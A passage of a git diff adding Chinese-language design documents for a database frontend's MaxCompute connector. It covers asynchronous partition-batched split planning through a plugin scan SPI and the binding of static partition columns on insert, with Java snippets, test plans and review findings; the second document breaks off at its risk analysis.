`MaxComputeScanNode:214-298` +对多分区表**分批异步**建 read session、经 `SplitAssignment` 流式喂 split。 + +**影响(P1-4 落地后已收窄)**:现在同步路径是「单 session 跨**已裁剪**分区集」(非全分区)。残留降级仅在**裁剪后仍命中 +大量分区**(≥ `num_partitions_in_batch_mode`,默认 1024)时显现:规划同步阻塞、无流式、单大 session → 大分区表 +规划慢 + 内存大、潜在 OOM。纯效率/内存,**行结果正确**。 + +## Root Cause + +通用插件层缺口:batch-mode 的消费侧 dispatch(`isBatchMode==true` → `SplitAssignment.init()` → `startSplit()` +异步喂 split)只在 `FileQueryScanNode.createScanRangeLocations:369-413` 实现,而其触发完全依赖 ScanNode 子类 +override `isBatchMode/numApproximateSplits/startSplit`。`PluginDrivenScanNode` 三者皆未 override → 死走非-batch。 +同时现有 SPI `ConnectorScanPlanProvider` 纯同步(仅 `planScan` 系列返回 `List`),无按分区分批/流式入口。 + +## 关键预核(recon 已证,决定可行性) + +- ✅ **`PluginDrivenScanNode extends FileQueryScanNode`**(`:86`)→ **已继承** batch dispatch 分支(`FileQueryScanNode:369-413`) + + `stop()` 拆解(`:689-698` 关 `SplitAssignment` + 注销 `SplitSource`)。**无需新建 ScanNode 类型、无需复制 dispatch**。 +- ✅ **`PluginDrivenSplit extends FileSplit`**(`PluginDrivenSplit.java:35`),legacy `MaxComputeSplit` 同(`:29`)。 + 故 batch 路径 `FileQueryScanNode:381` 的 `(FileSplit) splitAssignment.getSampleSplit()` 硬转型**安全**(否则 ClassCastException)。 +- ✅ **`SplitAssignment.addToQueue` 守空**(`:143-146` `if (splits.isEmpty()) return;`)→ 某分区批 0 split 不崩。 + **【SF-2 设计验证修正】** 区分两种「空」: + - **非空选但每批 0 split**(可达)→ 守空 + `startSplit` finally 的完成计数仍触发 `finishSchedule()`(`numFinished==total`)→ + `init()` 因 `!needMoreSplit()` 以 `sampleSplit==null` 退出 → `FileQueryScanNode:378` 当空扫,**无挂死**。 + - **全空选**(`selectedPartitions.isEmpty()`,`startSplit` 提前 return **不**调 `finishSchedule`,镜像 legacy `:241-244`)→ + 该分支在 batch 模式下**不可达**(`isBatchMode` 要求 `size() >= numPartitions >= 1`,见 isBatchMode 闸), + 仅为 legacy 保真保留的 **dead-code-by-invariant**;故不存在「全空选经 startSplit 致 `init()` 30s 挂死」路径。 +- ✅ legacy `isBatchMode` 4 个闸门输入:3 个通用可得(分区列=`selectedPartitions!=NOT_PRUNED`、slots=`desc.getSlots()`、 + 阈值=`sessionVariable.getNumPartitionsInBatchMode()` vs `selectedPartitions.size()`),**仅 `odpsTable.getFileNum()>0` 需经 SPI 暴露**。 + +## Design — Shape A(薄 SPI + fe-core 编排,逐字镜像 legacy) + +recon C 在 3 个候选(A 薄 SPI / B callback-sink / C iterator)中**强推 A**:连接器零 fe-core 类泄漏、其余 6 连接器默认不动、 +与 legacy byte-identical、唯一真实消费者(MaxCompute)。详见「替代方案」节。 + +### (1) SPI 改动(additive,零破坏)—— `ConnectorScanPlanProvider`(fe-connector-api)加两个 default + +```java +/** 连接器级 batch 资格闸(替代 legacy odpsTable.getFileNum()>0)。默认 false → 其余连接器走同步路。 */ +default boolean supportsBatchScan(ConnectorSession session, ConnectorTableHandle handle) { + return false; +} + +/** 单分区批 → 单 read session → 该批 ConnectorScanRange。默认委托 planScan(6 参) over 子集, + * 故已正确实现 6 参 planScan 的连接器(MaxCompute)无需 override 本方法。 + * ⚠️ 默认委托仅对「planScan(6 参) 按分区集建一个 session」语义的连接器正确;若未来 full-adopter 的 + * planScan 非按分区集分片,需 override 本方法 + supportsBatchScan 才允许开 batch(否则保持默认 false)。 */ +default List planScanForPartitionBatch( + ConnectorSession session, ConnectorTableHandle handle, + List columns, Optional filter, + long limit, List partitionBatch) { + return planScan(session, handle, columns, filter, limit, partitionBatch); +} +``` + +### (2) 连接器改动(MaxComputeScanPlanProvider)—— **仅 1 个 override** + +```java +@Override +public boolean supportsBatchScan(ConnectorSession session, ConnectorTableHandle handle) { + // 镜像 legacy MaxComputeScanNode:220-221 的 odpsTable.getFileNum()>0 + return <从 handle 取 odpsTable>.getFileNum() > 0; +} +``` + +`planScanForPartitionBatch` **不 override**:默认委托 `planScan(6 参)`,而 MaxCompute 的 `planScan(6 参)` 对给定分区集 +正是「建一个 TableBatchReadSession over 该子集 → 该批 split」(recon C),与 legacy `createTableBatchReadSession(子集)` 同形。 +**parity 必验项**(impl/review):连接器 `planScan` 的 session 构建逐字等同 legacy `createTableBatchReadSession` +(ArrowOptions MILLI/MICRO、splitOptions、required cols/partitions、filterPredicate)。 + +### (3) fe-core 改动(PluginDrivenScanNode)—— 3 个 override 原子落地(镜像 `MaxComputeScanNode:214-298`) + +> ⚠️ **三者必须一起加**:只加 `isBatchMode` 会令节点进 batch 分支但 `startSplit` no-op + `numApproximateSplits=-1` +> → `init()` 挂 30s 后抛 "Failed to get first split" + "Approximate split number should not be negative"(recon D)。 + +```java +@Override +public boolean isBatchMode() { + if (selectedPartitions == null || !selectedPartitions.isPruned) return false; // 非分区/未裁剪 + if (desc.getSlots().isEmpty()) return false; + // 【SF-1 设计验证】getScanPlanProvider() 默认 null(Connector.java:41-43);isBatchMode 跑在 + // dispatch(FileQueryScanNode:369)+ explain(FileScanNode:142)两路径、对每个 plugin-driven scan 执行, + // 无 SPI provider 的 full-adopter 会 NPE。镜像 getSplits():391 既有 null-guard。 + ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); + if (scanProvider == null || !scanProvider.supportsBatchScan(connectorSession, currentHandle)) { + return false; + } + int numPartitions = sessionVariable.getNumPartitionsInBatchMode(); + return numPartitions > 0 && selectedPartitions.selectedPartitions.size() >= numPartitions; +} + +@Override +public int numApproximateSplits() { + return selectedPartitions == null ? -1 : selectedPartitions.selectedPartitions.size(); +} + +@Override +public void startSplit(int numBackends) { + this.totalPartitionNum = selectedPartitions.totalPartitionNum; + this.selectedPartitionNum = selectedPartitions.selectedPartitions.size(); + if (selectedPartitions.selectedPartitions.isEmpty()) { + return; // 无数据可读(镜像 legacy :241-244) + } + // 与 getSplits 同序做 projection + filter 下推;【DEC-1】batch 不下推 limit(镜像 legacy 批路径忽略 limit) + final List columns = buildColumnHandles(); + tryPushDownProjection(columns); + final Optional remainingFilter = buildRemainingFilter(); + final ConnectorTableHandle handle = currentHandle; // 异步前 capture(projection 已改完 currentHandle) + final ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); + final List allPartitions = new ArrayList<>(selectedPartitions.selectedPartitions.keySet()); + final int batchSize = sessionVariable.getNumPartitionsInBatchMode(); + + Executor scheduleExecutor = Env.getCurrentEnv().getExtMetaCacheMgr().getScheduleExecutor(); + AtomicReference batchException = new AtomicReference<>(null); + AtomicInteger numFinished = new AtomicInteger(0); + + CompletableFuture.runAsync(() -> { // OUTER:驱动批循环(镜像 legacy :258-296) + for (int begin = 0; begin < allPartitions.size(); begin += batchSize) { + int end = Math.min(begin + batchSize, allPartitions.size()); + if (batchException.get() != null || splitAssignment.isStop()) break; + List batch = allPartitions.subList(begin, end); + int curBatchSize = end - begin; + try { + CompletableFuture.runAsync(() -> { // INNER:每批建 session→喂 split + try { + List ranges = scanProvider.planScanForPartitionBatch( + connectorSession, handle, columns, remainingFilter, -1L, batch); + List batchSplits = new ArrayList<>(ranges.size()); + for (ConnectorScanRange r : ranges) batchSplits.add(new PluginDrivenSplit(r)); + if (splitAssignment.needMoreSplit()) splitAssignment.addToQueue(batchSplits); + } catch (Exception e) { + batchException.set(new UserException(e.getMessage(), e)); + } finally { + if (batchException.get() != null) splitAssignment.setException(batchException.get()); + if (numFinished.addAndGet(curBatchSize) == allPartitions.size()) { + splitAssignment.finishSchedule(); + } + } + }, scheduleExecutor); + } catch (Exception e) { + batchException.set(new UserException(e.getMessage(), e)); + } + if (batchException.get() != null) splitAssignment.setException(batchException.get()); + } + }, scheduleExecutor); +} +``` + +非-batch `getSplits()` **保持不动**(含 P3-9 limit-opt + P1-4 pruned-to-zero 短路);本设计纯加 batch 分支。 + +## 设计决策(请评审) + +- **DEC-1:batch 路径不下推 limit(`planScanForPartitionBatch(..., -1L, batch)`)。** 镜像 legacy——legacy `startSplit` + 的 `createTableBatchReadSession` 从不应用 limit;limit-opt 仅在非-batch `getSplits` 的 `getSplitsWithLimitOptimization`。 + 传 -1 使 MaxCompute `planScan` 的 `shouldUseLimitOptimization`(要求 `limit>0`,见 P3-9/D-032)不触发 → **batch 与 + limit-opt 互斥**(recon C 警示二者会撞)。实践中二者本就少同现(limit-opt 要 onlyPartitionEquality→通常选少分区<阈值)。 +- **DEC-2:fileNum 闸门走新 `supportsBatchScan` capability**(默认 false),而非复用 `estimateScanRangeCount>0`。 + 后者语义是「并行度预估」、默认 -1,借用会模糊语义;专用布尔更清晰、对其余连接器默认安全。 +- **DEC-3:executor 复用 `ExtMetaCacheMgr.getScheduleExecutor()` + outer-driver/inner-batch 嵌套结构逐字照搬** + (recon A 警示:同一有界池跑 outer+N inner 有 starvation 风险,但这是 legacy 既有语义,须保持一致、不另起池)。 +- **DEC-4:`isBatchMode()` 结果建议字段缓存**(mirror IcebergScanNode `:992-1027`)——它在 dispatch / explain / 多处被读, + 且 `num_partitions_in_batch_mode` 是 `fuzzy=true`(测试随机 0..1024),重算会令 dispatch 与 explain 脱钩。 + +## Risk Analysis + +- **并发/生命周期契约**(recon B,最高风险):`startSplit` 必须严守 `SplitAssignment` 协议——loop on `needMoreSplit()`、 + `addToQueue` 推、正常结束 `finishSchedule()`、异常 `setException()`、尊重 `isStop()` 早退;`numApproximateSplits()≥0` + (否则 `FileQueryScanNode:384` 抛);`init()` 阻塞 30s 等首 split,故须快出首 split 或快 finish/except。上面代码逐字镜像 legacy 满足之。 +- **handle 线程可见性**:projection 下推在异步 submit **前**同步改完 `currentHandle`,已 capture 进 final 局部,异步只读 → 安全。 +- **空批/全空选**:非空选每批 0 split → `addToQueue` 守空 + 完成计数 `finishSchedule` → 空扫无挂;全空选分支在 batch gate 下**不可达**(dead-code-by-invariant,见预核 SF-2)。 +- **【SF-1】provider-less 连接器 NPE**:`isBatchMode` 必须 null-guard `getScanPlanProvider()`(默认 null)——它跑在 dispatch+explain 两路径、对所有 full-adopter 执行。已在设计 isBatchMode 加守卫 + 补 truth-table null-provider 行。 +- **限定不溢出到其余连接器**:SPI 两 default 均 false/委托,其余 6 连接器(es/jdbc/hive/paimon/hudi/trino)字节不变(recon C 已核)。 +- **测试 harness 缺位**:`PluginDrivenScanNode` 是 `FileQueryScanNode` 子类、裸构造需绕 ctor + stub 大量依赖,且 batch 路径 + 涉及真 `SplitAssignment`/executor/RPC(同 [DV-015] harness 缺位)→ batch wiring 的 offline 直测受限,逻辑半可单测、 + 端到端真值待 live(见 Test Plan + 拟登 DV-019)。 + +## Test Plan + +### Unit Tests(逻辑半,可 offline) +- `isBatchMode()` 真值表:非裁剪→false、空 slots→false、**null provider→false(SF-1,mirror getSplits:391)**、 + `supportsBatchScan=false`→false、`size<阈值`→false、`size≥阈值且全闸过`→true(**pin `num_partitions_in_batch_mode`**, + 因 fuzzy 随机;编码 WHY=大分区裁剪集才批,per Rule 9)。 +- `numApproximateSplits()` = `selectedPartitions.size()`(含 null 防御)。 +- mutation:闸门各条件取反 → 对应 test 变红;`numApproximateSplits` 常量化 → 红。 +- SPI default:`supportsBatchScan` 默认 false、`planScanForPartitionBatch` 默认委托 `planScan`(连接器 api 层测)。 + +### 受限/待 live(拟登 DV-019) +- `startSplit` 的 async 批循环 + `SplitAssignment` 喂 split + executor + 30s/异常/isStop 路径 → 无轻量 harness, + 逻辑由「逐字镜像 legacy + 上述不变式 UT」+ live e2e 守。 + +### E2E(CI-skip,真值闸) +- 大分区表(裁剪后 ≥ `num_partitions_in_batch_mode`):`EXPLAIN`/profile 证 **batched/streamed** split 生成 + (`(approximate)` 标记 + `inputSplitNum` 近似 + 规划耗时/内存 ≪ 同步路);行结果与同步路一致。 +- 阈值/资格边界:`num_partitions_in_batch_mode` 设 0 / 大于选中分区数 → 走非-batch(回归 getSplits)。 +- 全空选 + 单分区 → 正常空扫 / 单批。 + +## Batch-D 红线(recon E,必须写入) + +**Batch-D 红线**:legacy `MaxComputeScanNode` 的 batch-mode 逻辑(`MaxComputeScanNode.java:214-298` 的 +`isBatchMode`/`numApproximateSplits`/`startSplit` 异步分批建 read session + 流式喂 split)是**唯一逻辑副本**, +只能在**本 P3-11 通用 batch SPI 路径落地后**才允许删除;在此之前 Batch-D 设计 §1 对 `source/MaxComputeScanNode` +的「zero survivor risks」声明**不成立**。 + +- 读裁剪那半红线(`MaxComputeScanNode:718-731`)已由 FIX-PRUNE-PUSHDOWN(`072cd545c54`)清除 → **P3-11 是删 + `MaxComputeScanNode` 的最后一道前置闸**(第 5 道,前 4 道 overwrite/write-dist/bind/prune 均已落)。 +- **附带动作**:对 `P4-batchD-maxcompute-removal-design.md` §1(≈`:45`/`:63`)的 `source/MaxComputeScanNode` + 「zero survivor」声明加一行限定(dead-code-after-flip 仅指实例化链;read-pruning 已清、batch-mode 待 P3-11), + 交叉引用 HANDOFF `:64` 与各 per-fix 红线。 + +## 设计验证(clean-room,workflow `wcpg9lblj`) + +4 lens(correctness/concurrency、legacy-parity、SPI/blast-radius、test/red-line)独立审 → 每 finding 3 skeptic 对抗 verify +(≥2 票判真才留)→ synthesis。**结论 GO-WITH-EDITS:0 mustFix、2 shouldFix(已折入本文档)、17 rejected**。 + +- **SF-1(3/3,真 NPE)**:`isBatchMode` 漏 `getScanPlanProvider()` null-guard(默认 null、跑 dispatch+explain 两路径) + → 已加守卫镜像 `getSplits:391` + 补 truth-table null-provider 行。**唯一有运行期影响的修正。** +- **SF-2(2/3,doc-only)**:预核「全空选 finishSchedule 仍触发」与 startSplit 提前 return 自相矛盾 → 已改为 + dead-code-by-invariant(batch gate 下不可达)+ 区分「非空选每批 0 split」可达路径。 +- **17 rejected**:含 2 个 near-miss(planScanForPartitionBatch 默认委托对非分区分片 adopter 的陷阱 1/3、DEC-4 缓存 1/3) + → 均 <2/3,已顺手在 SPI 注释加一行 caveat(前者),无须 action。 +- legacy-parity / 并发契约 / blast-radius / Batch-D 红线核心判定**均通过**(无 confirmed 反对)。 + +## 实现 + 守门(已落) + +- **改动**:SPI `ConnectorScanPlanProvider` +2 default(`supportsBatchScan` false / `planScanForPartitionBatch` 委托 6 参 planScan); + 连接器 `MaxComputeScanPlanProvider.supportsBatchScan`=`odpsTable.getFileNum()>0`(`planScanForPartitionBatch` 不 override,继承默认); + fe-core `PluginDrivenScanNode` +`isBatchMode`/`computeBatchMode`(SF-1 null-guard)/纯静态 `shouldUseBatchMode`/`numApproximateSplits`/`startSplit` + + `isBatchModeCache` 字段 + imports(Env/CompletableFuture/Executor/Atomic*)。 +- **守门**:编译 BUILD SUCCESS(fe-connector-api+maxcompute+fe-core);fe-core UT 9/9;fe-connector-api UT 2/2;checkstyle 0; + import-gate 净;**mutation 5/5 向红**(A `!isPruned`→`false` / B `!hasSlots` flip / C `!supportsBatchScan` flip / D `>0`→`>=0` / E `>=`→`>`)。 +- **operational 坑(auto-memory 记)**:mutation 跑中 `/mnt/disk1` 系统级 100% 满(非本 repo 数据,target 仅 3.65G)致 cp 还原失败一度 truncate 产线文件;已从 RAM(`/dev/shm`) 备份还原、D/E 重跑确认。教训:mutation 还原备份须放 RAM/异盘,勿与构建同盘。 + +## impl-review(clean-room,workflow `wve7y1jst`,3 lens + 对抗 verify) + +**结论 GO-WITH-EDITS:0 mustFix、1 shouldFix、2 nit(6 rejected),均注释/文档级、无产线逻辑改**: +- **TQ-1(shouldFix,3/3)**:测试 javadoc 过度声称 SF-1 null-provider 已覆盖——实则 9 测全调纯静态 `shouldUseBatchMode`(传预算 `supportsBatchScan` 布尔),从不经 `computeBatchMode` 的 null-guard。**修=诚实降级**(option b):改测试注释不再声称覆盖 + 把 null-guard 与 `startSplit` async 记为 live-only/DV-019 gap(构造 `PluginDrivenScanNode` 需本模块缺位的 harness)。 +- **LP-1(nit,2/3)**:`!isPruned` vs legacy 引用 `!= NOT_PRUNED`——等价且略强(非分区表恒携 NOT_PRUNED)。修=`shouldUseBatchMode` javadoc 加注。 +- **TQ-2(nit,2/3)**:`testNotPrunedNeverBatches` 对 `!isPruned` guard 非判别(NOT_PRUNED 空 map,0>=阈值恒 false);真正杀手是 `testUnprocessedPruningNeverBatches`。修=注释挑明。 +- legacy-parity / 并发契约 / SPI blast-radius 核心判定均通过(无 confirmed 反对)。 + +## Implementation Plan(评审通过后) +1. SPI:`ConnectorScanPlanProvider` 加 `supportsBatchScan` + `planScanForPartitionBatch` 两 default。 +2. 连接器:`MaxComputeScanPlanProvider.supportsBatchScan` override(fileNum>0);核 `planScan` session 构建 parity。 +3. fe-core:`PluginDrivenScanNode` 加 `isBatchMode`/`numApproximateSplits`/`startSplit`(+ isBatchMode 字段缓存)。 +4. UT + mutation(逻辑半);checkstyle + import-gate + 连接器编译 BUILD SUCCESS。 +5. Batch-D 设计 doc 加红线限定行。 +6. clean-room 设计验证 workflow(多 lens 对抗)→ impl-review workflow 收敛 → 独立 commit + hash 回填 + D-035/DV-019。 + +## 替代方案(recon C 提供,留档) +- **Shape B(callback sink)**:连接器侧 push,新增 `ConnectorScanRangeSink` 类型,连接器自控批大小/顺序/async。 + 优:真流式背压在连接器内。劣:新 SPI 类型 + 连接器须精确实现线程/生命周期契约、batching 策略与 scan-node 既得信息重复、 + 难 byte-identical legacy(生命周期所有权移入连接器)。 +- **Shape C(lazy iterator)**:`Iterator> planScanBatched(...)`,`startSplit` 拉取喂 SplitAssignment。 + 优:纯返回值扩展、连接器 pull/可单测。劣:异常须经 `next()` 透传(包 unchecked)、对唯一消费者过度泛化。 +- **DV-only(不实现)**:原 HANDOFF 建议,已被用户否决(用户定「实现」)。 + +## 关联 +- 决策 [D-035](待)、偏差 [DV-019](待,wiring harness 缺位) +- 复审 [§A NG-7](../../reviews/P4-maxcompute-full-rereview-2026-06-07.md)、[READ-C5](../../reviews/P4-cutover-review-findings.md) +- 前置 [FIX-PRUNE-PUSHDOWN 设计](./P4-T06e-FIX-PRUNE-PUSHDOWN-design.md) / [D-031];Batch-D [removal 设计](../P4-batchD-maxcompute-removal-design.md) +- recon 全量证据:workflow `wiczf63pp` diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md new file mode 100644 index 00000000000000..c8cc0db3884ca6 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md @@ -0,0 +1,191 @@ +# P4-T06e — FIX-BIND-STATIC-PARTITION (P0-3) — Design + +> 来源 finding:`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §A NG-3 (F48) / §B DG-2 (F19)。 +> 关联:P0-1 FIX-OVERWRITE-GATE(`59699a62f33`)、**P0-2 FIX-WRITE-DISTRIBUTION(`f0adedba20c`)——本 fix 经用户批准回退其 cols→full-schema 索引**。 +> 流程:设计→改→编译+UT+mutation→对抗 review→commit。本文跨轮更新。 + +--- + +## Problem + +翻闸后 MaxCompute 写走通用 connector SPI sink(`UnboundConnectorTableSink` → `BindSink.bindConnectorTableSink` → `LogicalConnectorTableSink` → `PhysicalConnectorTableSink` → `MaxComputeWritePlanProvider` → BE `VMCTableWriter`)。 + +**Blocker(F19/F48,all-static 无列名)**: +```sql +INSERT INTO mc_part_tbl PARTITION(pt='x') SELECT <非分区列> -- 无列名 +``` +在 `BindSink.java:941` 抛 `"insert into cols should be corresponding to the query output"`。`SELECT` 只产数据列(child output = N),但 `bindConnectorTableSink` 在 `colNames` 为空时 `bindColumns = table.getBaseSchema(true)`(含分区列 `pt`,= N+M),列数校验失败。 + +**深层耦合(partial-static,复审未覆盖、本设计新发现)**:legacy-parity 要求支持混合静态/动态分区(`PARTITION(ds='x') SELECT id,val,region`,ds 静态、region 动态——legacy 支持且 `test_mc_write_static_partitions.groovy` Test 7 回归断言其有 SORT 节点)。修 blocker 时把 child 投影成 **full-schema**(BE 需要、见下)会与 **P0-2 的「按 cols 位置索引分区列」** 冲突:partial-static 下 `cols` 排除了静态 `ds`,但 child 是 full-schema 含 `ds`,cols 位置与 full-schema 位置错位 → 分布按错列 hash/sort → MaxCompute Storage API streaming 写 "writer has been closed"。**两者不可同时满足**(无任何 child 列序能同时满足「BE 末尾擦除 full-schema 分区列」与「P0-2 cols 位置索引」),故须把 P0-2 的索引回退为 legacy 的 full-schema 索引。 + +--- + +## Root Cause + +1. **bind 期未剔除静态分区列**:`bindConnectorTableSink`(克隆自 `bindJdbcTableSink`,JDBC 无静态分区)`:917-919` 取 full base schema、从不读 `sink.getStaticPartitionKeyValues()`,亦不像 legacy `bindMaxComputeTableSink:870-879` 那样过滤静态分区列。过期注释 `:944-948`「Currently only JDBC catalogs use connector sink」翻闸后未更新。 +2. **VALUES 路径未接 connector**:`InsertUtils.java:377-389` 只对 `UnboundIcebergTableSink`/`UnboundMaxComputeTableSink` 在无列名时剔除静态分区列做默认值生成,未加 `UnboundConnectorTableSink` 分支。 +3. **P0-2 cols 索引与 BE full-schema 契约冲突(partial-static)**:见上「深层耦合」。 + +### BE 契约(决定 child 必须 full-schema)——已逐层核证 + +| 环节 | 证据 | 结论 | +|---|---|---| +| BE 静态分区擦除 | `be/.../vmc_table_writer.cpp:83-95` `if(!_partition_column_names.empty() && _has_static_partition){ data_cols = total_cols - num_partition_cols; 擦除末尾 num_partition_cols; }` + `:154-163` 按 `_static_partition_spec` 路由、`output_block.erase(_non_write_columns_indices)` | BE **假定** FE 传的 `output_exprs` = 数据列 + **全部分区列在末尾**,擦除末尾 `num_partition_cols` | +| 连接器 thrift 总设 partition_columns | `MaxComputeWritePlanProvider:123-128` 表有分区即 `setPartitionColumns(全部分区列)`,静态时 `setStaticPartitionSpec` | all-static / partial-static 均触发 BE 擦除分支(与 legacy `MaxComputeTableSink:79-93` 等价) | +| output_exprs 来源 | `PhysicalPlanTranslator.translatePlan:308-314` fallback:root fragment outputExprs 空 → 取 `physicalPlan.getOutput()`(= sink `outputExprs.toSlot()` = `withChildAndUpdateOutput(project)` 后的 child 输出);BE `pipeline_fragment_context.cpp` 取 `fragment.output_exprs` 传 `MCTableSinkOperatorX`(`maxcompute_table_sink_operator.h:47,55`) | **FE 的 child 投影直接决定 BE 列集**。child 投 full-schema → BE 收 full-schema → 正确擦末尾分区列 | +| 分区列可空性 | legacy `MaxComputeExternalTable.initSchema:188-190` partition col `isAllowNull=true`;connector `MaxComputeConnectorMetadata.getTableSchema` partition col `isNullable=true`(硬编码) | `getColumnToOutput:457-465` 对未提及静态分区列填 `NullLiteral` **不抛**(两路一致) | + +**净结论**:connector 静态分区写要 BE 正确,child 必须 = full-schema(数据列 + 分区列在末尾,静态列填 NULL),**与 legacy `bindMaxComputeTableSink` 完全一致**。 + +--- + +## Design + +**总纲:把 connector 写路径在「分区表」下做成 legacy `bindMaxComputeTableSink` + `PhysicalMaxComputeTableSink` 的忠实泛化**(capability 门保留 P0-2 对 JDBC/ES 的 GATHER 隔离),非分区表(JDBC/ES)维持现状。 + +### 改动 1 — `BindSink.bindConnectorTableSink`(fe-core) + +```java +Map staticPartitions = sink.getStaticPartitionKeyValues(); +Set staticPartitionColNames = staticPartitions != null + ? staticPartitions.keySet() : Sets.newHashSet(); + +List bindColumns; +if (sink.getColNames().isEmpty()) { + bindColumns = table.getBaseSchema(true).stream() + .filter(col -> !staticPartitionColNames.contains(col.getName())) // ← 新增过滤 + .collect(ImmutableList.toImmutableList()); +} else { /* 不变:用户列 */ } + +LogicalConnectorTableSink boundSink = new LogicalConnectorTableSink<>(... bindColumns, child.getOutput()...); +if (boundSink.getCols().size() != child.getOutput().size()) { throw ...; } // 现在 N==N 通过 + +if (!staticPartitionColNames.isEmpty()) { + // 静态分区:镜像 legacy bindMaxComputeTableSink:904-907 —— child 投 full-schema, + // 静态分区列填 NULL 在 full-schema 末尾,使 BE 按位置擦除正确。 + Map columnToOutput = getColumnToOutput(ctx, table, false, boundSink, child); + LogicalProject fullProject = getOutputProjectByCoercion(table.getFullSchema(), child, columnToOutput); + return boundSink.withChildAndUpdateOutput(fullProject); +} +// 无静态分区(JDBC/ES/纯动态):维持现有 JDBC 风格投影(user/cols 序)。 +Map columnToOutput = getConnectorColumnToOutput(bindColumns, child); +LogicalProject outputProject = getOutputProjectByCoercion(bindColumns, child, columnToOutput); +return boundSink.withChildAndUpdateOutput(outputProject); +``` + +**分支键 = `!staticPartitionColNames.isEmpty()`(仅静态分区走 full-schema 投影)**: +- 纯动态:`staticPartitions` 空 → ELSE 分支,`bindColumns = full base schema`、JDBC 投影后 child = full-schema 序(与 full-schema 投影同效),不变。 +- JDBC(无分区、可能有用户列子集):ELSE 分支,维持 user 序,**零行为变更**(JDBC 无静态分区)。 +- 复用 legacy helper `getColumnToOutput`/`getOutputProjectByCoercion` → 与 legacy 逐字一致(OLAP 分支被 `instanceof OlapTable` 守门、对外表惰性;`isPartialUpdate=false`)。 +- 类型安全:`LogicalConnectorTableSink extends LogicalTableSink`(与 `LogicalMaxComputeTableSink` 同基),`getColumnToOutput(... LogicalTableSink ...)` 接受;`UnboundConnectorTableSink` 与 `UnboundMaxComputeTableSink` 同基(`UnboundBaseExternalTableSink`)满足 ctx 泛型。 + +更正过期注释 `:944-948`。 + +### 改动 2 — `PhysicalConnectorTableSink.getRequirePhysicalProperties`(fe-core,**回退 P0-2**) + +把 P0-2 的「按 cols 位置索引分区列」改回 legacy `PhysicalMaxComputeTableSink:111-155` 的「按 full-schema 位置索引」。**保留 P0-2 的 capability 门**(`requirePartitionLocalSortOnWrite()` / `supportsParallelWrite()` / 否则 GATHER),只换索引方式: + +```java +if (table.requirePartitionLocalSortOnWrite()) { + Set partitionNames = table.getPartitionColumns()→names; + if (!partitionNames.isEmpty()) { + Set colNames = cols→names; + boolean hasDynamicPartition = partitionNames.anyMatch(colNames::contains); // cols 仍排除静态列 + if (hasDynamicPartition) { + List fullSchema = targetTable.getFullSchema(); // ← 按 full-schema 索引 + columnIdx = [i | partitionNames.contains(fullSchema[i].name)]; + exprIds = columnIdx.map(i -> child().getOutput().get(i).exprId); + orderKeys = columnIdx.map(i -> new OrderKey(child().getOutput().get(i), true, false)); + return hash(exprIds) + MustLocalSort(orderKeys); + } + // 全静态:落下 + } +} +return table.supportsParallelWrite() ? SINK_RANDOM_PARTITIONED : GATHER; +``` + +为何正确(child 现为 full-schema,全 case 与 legacy 一致): +- **纯动态** `SELECT ...,ds,region`:cols=child=fullSchema → cols 索引≡full-schema 索引,行为不变(hash/sort by 全分区列)。 +- **partial-static** `PARTITION(ds='x') SELECT ...,region`:cols 排除 ds、含 region → `hasDynamicPartition`=true;child=full-schema `[...,ds(null),region]`;full-schema 索引 columnIdx={ds_pos,region_pos} → hash/sort by `[ds, region]`(ds 为 NULL 常量、实质 by region)= **legacy 同款**。〔cols 索引则 region@cols_pos 命中 child 的 ds → 错列,正是要修的 bug。〕 +- **全静态** `PARTITION(ds='x',region='y') SELECT ...`:cols 无分区列 → `hasDynamicPartition`=false → 落 `SINK_RANDOM_PARTITIONED`(不索引 child)= legacy branch-2。 +- **JDBC/ES**:`requirePartitionLocalSortOnWrite()`=false → 直落 `supportsParallelWrite()?RANDOM:GATHER`(capability 门保留)。 + +更新该方法 + 类 javadoc 的「index by cols」表述为「index by full-schema」。 + +### 改动 3 — `InsertUtils.java:377-389`(VALUES 路径) + +`UnboundMaxComputeTableSink` 分支后加: +```java +} else if (unboundLogicalSink instanceof UnboundConnectorTableSink) { + staticPartitions = ((UnboundConnectorTableSink) unboundLogicalSink).getStaticPartitionKeyValues(); +} +``` +(`getStaticPartitionKeyValues()` 已暴露,line 84。补 import。)使 `PARTITION(p='x') VALUES (...)` 无列名时默认值生成剔除静态分区列。 + +### 改动 4 — 测试更新(`PhysicalConnectorTableSinkTest`) + +P0-2 测试基于 cols 索引;改 full-schema 索引后: +- `table()` helper 增 `getFullSchema()` stub。 +- `dynamicPartitionWriteRequiresHashAndLocalSort`:纯动态 cols==fullSchema,断言不变(partSlot@idx1)。 +- `allStaticPartitionWriteUsesRandomPartitioned`:不索引 child,不变。 +- **新增 `partialStaticPartitionHashesByDynamicColumn`**:cols=[data,region]、child=[dataSlot,dsSlot,regionSlot](full-schema [data,ds,region])、partitionCols=[ds,region]、fullSchema=[data,ds,region] → 断言 hash keys=`[dsSlot,regionSlot]`、sort=`[dsSlot,regionSlot]`(pin full-schema 索引;cols 索引会得 `[dsSlot]`/错列 → 红)。 + +### 改动 5 — doc-sync + +- `P4-T06e-FIX-WRITE-DISTRIBUTION-design.md`:在「index by cols」节加 superseded 注(P0-3 因 partial-static parity 回退为 full-schema 索引)。 +- `P4-T05-T06-cutover-design.md` G4/G5/DECISION-3:更正「忠实镜像」声明漏了 bind 期静态分区列剔除。 +- `decisions-log.md` / `deviations-log.md`:登记本轮结论 + P0-2 索引回退。 +- HANDOFF / task-list-P4-rereview:回填。 + +--- + +## Implementation Plan + +1. `BindSink.bindConnectorTableSink` — 过滤静态分区列 + 静态分支 full-schema 投影 + 改注释。 +2. `PhysicalConnectorTableSink.getRequirePhysicalProperties` — cols→full-schema 索引 + javadoc。 +3. `InsertUtils.java` — 加 `UnboundConnectorTableSink` 分支 + import。 +4. `PhysicalConnectorTableSinkTest` — stub getFullSchema + 新增 partial-static 测试。 +5. 新增 `BindConnectorSinkStaticPartitionTest`(见 Test Plan)— pin bind 期列过滤。 +6. doc-sync。 +7. 编译(`:fe-core -am`)+checkstyle+import-gate+UT+mutation。 + +--- + +## Risk Analysis + +- **R1 回退 